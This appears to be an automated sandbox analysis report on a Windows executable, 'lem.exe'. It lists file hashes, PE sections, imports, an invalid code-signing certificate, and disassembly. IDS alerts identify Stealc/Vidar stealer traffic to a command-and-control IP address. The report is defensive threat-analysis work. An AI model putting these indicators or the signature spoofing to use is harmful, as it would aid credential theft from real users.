Preview:	)]}'.["",["santacon nyc bar crawl","luke altmyer","coryxkenshin manga","nintendo switch 2 leaks","weather forecast snow storm","december 15 full moon astrology","mega millions jackpot lottery","oliver wahlstrom boston bruins"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"google:entityinfo":"Cg0vZy8xMWdiaGM3ajUwEhRGb290YmFsbCBxdWFydGVyYmFjazLLDmRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQklnQUNFUUVERVFIL3hBQWNBQUFEQUFJREFRQUFBQUFBQUFBQUFBQUFCZ2NFQlFFQ0F3ai94QUF5RUFBQ0FRTUNBd1lFQlFVQUFBQUFBQUFCQWdNRUJSRUFFZ1loTVFjaVFWRmhjUk1VZ1pFVk1rS2hzVU5TWXBMUi84UUFHUUVBQXdFQkFRQUFBQUFBQUFBQUFBQU

Chrome Cache Entry: 93

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 94

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	132999
Entropy (8bit):	5.435805366369722
Encrypted:	false
SSDEEP:	3072:fjktv3zg+newH5FsYZGFsxIo9Le13y2i6o:f+vn/H/MFsxIo9Y3y8o
MD5:	0ADB316E991FF77FFCC86AD3A73FF407
SHA1:	DAA21DED5E09F2462521B7B2AFD90C6AA4B18B46
SHA-256:	1484F790060E14AD6C37A82CC6D7937BCBD1A3FCF268F75F74007281E693BE13
SHA-512:	ACE571CC39835255BE768288456ABCE6426DBACBC637074A548EC4552C1413EDD739E1464CBC7F34B881F09CC8584637CC97B91716F15863EB01D9B1FD83A2A0
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.973423478278547
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	lem.exe
File size:	978'099 bytes
MD5:	27b18a5e8bdaa950af93633a821c2bfa
SHA1:	5763fb49a0dcdb77959cf503f008b6f863c1e92d
SHA256:	b9c936992c244ab9864cf92bfe3365f7316b306846a4827aa91740da78dee813
SHA512:	eeaa5cd8ff38655b8c4c1105d05862722b660e5eb2a9c74cc08d6eb3d5678ba8803abd3d0f6cd62b3a385017c19373da87bf0f1093a5aeaabac8777fa0c2a144
SSDEEP:	24576:pwalP8xAuX4r2UW6hFgpnzmhmwMpG/lhX1/tnn2K2:5LWjcFDtv1/tnn2K2
TLSH:	9E25236B6BA5C93EEF822E315172BA6B51B9F6500C24D64FE314FCCF78376410D28A52
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...(...B...8.....

File Icon


Icon Hash:	ccb2b1313133b2cc

Static PE Info

General

Entrypoint:	0x4038af
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=VeriSign Class 3 Code Signing 2009-2 CA, OU=Terms of use at https://www.verisign.com/rpa (c)09, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	01/07/2010 20:00:00 02/07/2011 19:59:59
Subject Chain	CN=USBlyzer, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=USBlyzer, L=St. Petersburg, S=St. Petersburg, C=RU
Version:	3
Thumbprint MD5:	75297C190C025C7A82B15677D333560E
Thumbprint SHA-1:	86E18A81B94E1011C5D3E1E60789AAACCF36704A
Thumbprint SHA-256:	1E9B8DE53D2F7273D2C9CBBF7AA2382E1A6C2141774B5C41FFE26E60A0F07CC9
Serial:	62FCC26A7F4A434259B8883B05A42C28

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007EFC808CA89Bh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007EFC808CA57Dh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007EFC808CA56Bh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007EFC808C7E6Ah
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007EFC808CA241h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007EFC808C7EF3h
push 00000020h
pop ebx
cmp ax, bx
jne 00007EFC808C7E6Ah
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xac40	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x100000	0xb756	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xed26b	0x1a48	.ndata
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x86000	0x994	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x728c	0x7400	419d4e1be1ac35a5db9c47f553b27cea	False	0.6566540948275862	data	6.499708590628113	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x2b6e	0x2c00	cca1ca3fbf99570f6de9b43ce767f368	False	0.3678977272727273	data	4.497932535153822	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x72b9c	0x200	77f0839f8ebea31040e462523e1c770e	False	0.279296875	data	1.8049406284608531	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x7f000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x100000	0xb756	0xb800	53aef6a586de78fe8545f921ffa8daf0	False	0.8768894361413043	data	7.603397864273553	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10c000	0xfd6	0x1000	b65596335bd7a274d18b2143543f8eaf	False	0.59765625	data	5.58889695963986	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1001f0	0x68d9	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	0.9950076375693901
RT_ICON	0x106acc	0x209f	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0013172075200574
RT_ICON	0x108b6c	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.5272579332790887
RT_DIALOG	0x10b1d4	0x100	data	English	United States	0.5234375
RT_DIALOG	0x10b2d4	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x10b3f0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x10b450	0x30	data	English	United States	0.8958333333333334
RT_MANIFEST	0x10b480	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-15T20:47:34.861412+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.4	49742	116.203.12.241	443	TCP
2024-12-15T20:47:37.153833+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	116.203.12.241	443	192.168.2.4	49743	TCP
2024-12-15T20:47:39.457532+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	116.203.12.241	443	192.168.2.4	49744	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2024 20:47:03.820225954 CET	49675	443	192.168.2.4	173.222.162.32
Dec 15, 2024 20:47:21.802925110 CET	49723	80	192.168.2.4	2.20.68.201
Dec 15, 2024 20:47:21.923854113 CET	80	49723	2.20.68.201	192.168.2.4
Dec 15, 2024 20:47:21.923945904 CET	49723	80	192.168.2.4	2.20.68.201
Dec 15, 2024 20:47:25.391431093 CET	49738	443	192.168.2.4	149.154.167.99
Dec 15, 2024 20:47:25.391488075 CET	443	49738	149.154.167.99	192.168.2.4
Dec 15, 2024 20:47:25.391556025 CET	49738	443	192.168.2.4	149.154.167.99
Dec 15, 2024 20:47:25.421597004 CET	49738	443	192.168.2.4	149.154.167.99
Dec 15, 2024 20:47:25.421633005 CET	443	49738	149.154.167.99	192.168.2.4
Dec 15, 2024 20:47:26.811956882 CET	443	49738	149.154.167.99	192.168.2.4
Dec 15, 2024 20:47:26.812151909 CET	49738	443	192.168.2.4	149.154.167.99
Dec 15, 2024 20:47:27.043165922 CET	49738	443	192.168.2.4	149.154.167.99
Dec 15, 2024 20:47:27.043222904 CET	443	49738	149.154.167.99	192.168.2.4
Dec 15, 2024 20:47:27.044351101 CET	443	49738	149.154.167.99	192.168.2.4
Dec 15, 2024 20:47:27.044517994 CET	49738	443	192.168.2.4	149.154.167.99
Dec 15, 2024 20:47:27.049325943 CET	49738	443	192.168.2.4	149.154.167.99
Dec 15, 2024 20:47:27.095338106 CET	443	49738	149.154.167.99	192.168.2.4
Dec 15, 2024 20:47:27.488455057 CET	443	49738	149.154.167.99	192.168.2.4
Dec 15, 2024 20:47:27.488492966 CET	443	49738	149.154.167.99	192.168.2.4
Dec 15, 2024 20:47:27.488578081 CET	443	49738	149.154.167.99	192.168.2.4
Dec 15, 2024 20:47:27.488630056 CET	443	49738	149.154.167.99	192.168.2.4
Dec 15, 2024 20:47:27.488742113 CET	49738	443	192.168.2.4	149.154.167.99
Dec 15, 2024 20:47:27.488742113 CET	49738	443	192.168.2.4	149.154.167.99
Dec 15, 2024 20:47:27.488742113 CET	49738	443	192.168.2.4	149.154.167.99
Dec 15, 2024 20:47:27.491027117 CET	49738	443	192.168.2.4	149.154.167.99
Dec 15, 2024 20:47:27.491099119 CET	443	49738	149.154.167.99	192.168.2.4
Dec 15, 2024 20:47:27.645077944 CET	49740	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:27.645118952 CET	443	49740	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:27.645253897 CET	49740	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:27.645644903 CET	49740	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:27.645658016 CET	443	49740	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:29.530391932 CET	443	49740	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:29.530505896 CET	49740	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:29.545217037 CET	49740	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:29.545234919 CET	443	49740	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:29.546135902 CET	443	49740	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:29.546210051 CET	49740	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:29.546606064 CET	49740	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:29.591340065 CET	443	49740	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:30.233788967 CET	443	49740	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:30.233882904 CET	49740	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:30.233901024 CET	443	49740	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:30.233958006 CET	443	49740	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:30.234041929 CET	49740	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:30.234041929 CET	49740	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:30.236413956 CET	49740	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:30.236430883 CET	443	49740	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:30.238020897 CET	49741	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:30.238082886 CET	443	49741	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:30.238203049 CET	49741	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:30.238377094 CET	49741	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:30.238399029 CET	443	49741	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:31.646975994 CET	443	49741	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:31.647070885 CET	49741	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:31.647537947 CET	49741	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:31.647553921 CET	443	49741	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:31.649679899 CET	49741	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:31.649692059 CET	443	49741	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:32.533415079 CET	443	49741	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:32.533570051 CET	443	49741	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:32.533608913 CET	49741	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:32.533651114 CET	49741	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:32.533777952 CET	49741	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:32.533801079 CET	443	49741	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:32.535232067 CET	49742	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:32.535270929 CET	443	49742	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:32.535381079 CET	49742	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:32.535558939 CET	49742	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:32.535573959 CET	443	49742	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:33.943347931 CET	443	49742	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:33.943412066 CET	49742	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:33.943970919 CET	49742	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:33.943981886 CET	443	49742	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:33.946005106 CET	49742	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:33.946011066 CET	443	49742	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:34.861447096 CET	443	49742	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:34.861502886 CET	443	49742	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:34.861526966 CET	49742	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:34.861548901 CET	443	49742	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:34.861562967 CET	49742	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:34.861588955 CET	49742	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:34.861596107 CET	443	49742	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:34.861638069 CET	49742	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:34.861671925 CET	443	49742	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:34.861721039 CET	49742	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:34.865103960 CET	49742	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:34.865124941 CET	443	49742	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:34.866991043 CET	49743	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:34.867111921 CET	443	49743	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:34.867244005 CET	49743	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:34.867692947 CET	49743	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:34.867733002 CET	443	49743	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:36.275594950 CET	443	49743	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:36.275712013 CET	49743	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:36.279288054 CET	49743	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:36.279335022 CET	443	49743	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:36.286835909 CET	49743	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:36.286890030 CET	443	49743	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:37.153390884 CET	443	49743	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:37.153458118 CET	443	49743	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:37.153605938 CET	443	49743	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:37.153697968 CET	49743	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:37.153928041 CET	49743	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:37.153928041 CET	49743	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:37.155467033 CET	49744	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:37.155525923 CET	443	49744	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:37.155608892 CET	49744	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:37.155930996 CET	49744	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:37.155952930 CET	443	49744	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:37.460911036 CET	49743	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:37.460958004 CET	443	49743	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:38.562819958 CET	443	49744	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:38.562887907 CET	49744	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:38.563360929 CET	49744	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:38.563369989 CET	443	49744	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:38.565625906 CET	49744	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:38.565633059 CET	443	49744	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:39.457149029 CET	443	49744	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:39.457319021 CET	443	49744	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:39.457438946 CET	49744	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:39.457438946 CET	49744	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:39.457530022 CET	49744	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:39.457551956 CET	443	49744	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:39.475289106 CET	49745	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:39.475399017 CET	443	49745	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:39.475497961 CET	49745	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:39.475737095 CET	49745	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:39.475769043 CET	443	49745	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:40.463856936 CET	49746	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:40.463905096 CET	443	49746	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:40.463993073 CET	49746	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:40.464248896 CET	49746	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:40.464268923 CET	443	49746	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:40.882713079 CET	443	49745	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:40.882839918 CET	49745	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:40.883399010 CET	49745	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:40.883410931 CET	443	49745	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:40.885680914 CET	49745	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:40.885685921 CET	443	49745	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:40.885735035 CET	49745	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:40.885745049 CET	443	49745	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:41.888744116 CET	443	49746	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:41.888938904 CET	49746	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:41.889075041 CET	443	49745	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:41.889142036 CET	49745	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:41.889158964 CET	443	49745	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:41.889204025 CET	49745	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:41.889255047 CET	443	49745	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:41.889307976 CET	49745	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:41.889523983 CET	49746	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:41.889549971 CET	443	49746	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:41.890266895 CET	49745	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:41.890284061 CET	443	49745	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:41.891424894 CET	49746	443	192.168.2.4	116.203.12.241
